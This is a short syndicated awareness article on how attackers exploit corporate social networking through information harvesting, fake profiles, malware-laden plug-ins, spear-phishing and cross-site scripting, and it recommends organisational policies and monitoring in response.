Safety implications of social networking
With the boom in corporate use of social networking, there come great dangers of information exploitation by the use of aggregated data from different social networks. There are various data mining processes which can be used by attackers to target organizations. Facebook, LinkedIn and Twitter provide details on an individual; including contact information, employment details, financial details, and much more. A potential attacker can easily harvest information on organizational structure, potential clients and associates, company operations, and even the business infrastructure of different divisions, just by following the profile changes or status updates of the targeted individual.
Majorly, an attacker exploits the social engineering element of trust when initiating a social networking attack. People easily tend towards trusting information fed to them through social networking sites and applications and even end up befriending strangers. This inherent trust can easily be exploited by the attacker to target an employee and gain access to company information and use it in more than one ways. The average user doesn’t really anticipate social engineering attacks and ends up as an easy victim of the attacker who they supposedly trust.
Furthermore, it’s very easy to fake or create identities on a social networking platform. Such fake identities can be easily used in obtaining digital signatures of an employee and approach other members of the organization. Once the penetration is done, it can very conveniently be used for other malicious activities. A potential attacker can propagate malware through an organization’s network in the form of viruses or Trojans. Employees can be easily coerced by social engineering tactics, and made to open or download infected files and attachments. Most often links are posted on sites which require users to install plug-ins in order to view the available content. Most users do so without thinking much, and easily expose the vulnerabilities of an organization without any security policy against installation. All these attacks lead to installation of malware on a computer which is highly likely to be a part of an organization, and can be used in data thefts and misuse of information. Read about Social Group Management.
Another mode through which sensitive information such as usernames, passwords, credit card, etc., can be acquired is phishing. Phishing in corporate sense is known as Spear-Phishing or Whaling. It is one of the most popular attack method used by web criminals and hackers. This is an easy to use method and is considered as the best choice by attackers due to its high success rate despite its common use. As mentioned earlier, social networking sites and applications provide information which is easily trusted by ignorant individuals. They are not aware of the existent threats and fall easily for the malware attacks concealed within these platforms. Powerful attacks can be launched against organizations, such as duplicating a company’s website portals. After sufficient trust is gained within the organization network of employees, the attack is launched in the form of attracting employees towards the Phishing site. Due to the fake website’s similarity with the actual company page, employees do not hesitate in providing their employment credentials which is directly sent to the attacker’s computer. Read about Social Networking Service Assignment.
A more effective method of infiltrating internal organization networks is through exploitation of cross site scripting vulnerabilities coupled with the existing attack methods. In this method, the attacker only needs a link instead of a phishing website, with fake login forms within the webpage of organization’s actual network. The method is less suspicious as the link distributed directs to the actual webpage of the company, and therefore, proves more efficient and reliable for the attacker. On summing it up, it turns out that a potential attacker can easily gather information, by using legitimate actions within social networking applications, and without using any traditional legally jeopardizing attack methods. The acquired data provides an efficient and reliable way to launch a much more organized attack and compromise the position of the targeted organization.
Protection against these threats requires an organization to formulate a strategy which covers all aspects of social networking use for personal or professional purposes. The policies laid out in the strategy should spread awareness among the employees updating them with the possible threats, resulting risks, and implications of the control measures. Company exposure to the social networking sites should be constantly monitored, and any information exchanges performed through externally hosted sites or applications, or company’s internal network should be kept in check as well. Companies today should be aware that sensitive internal information is very crucial to their competitors and if laid hands on, can come up with serious fatal strategic implications. It is very easy to gather information using social networking platform, and the fact that abundant information is available effortlessly and legally to the competitors, should not be underestimated.
Source: Free Articles from ArticlesFactory.com
ABOUT THE AUTHOR
Kate Yeng is a blog enthusiast. He is passionate about programming and codes. Currently, he is working with Assignment Help Australia, which provides quality assignment help of assignments given in PG/ PhD universities.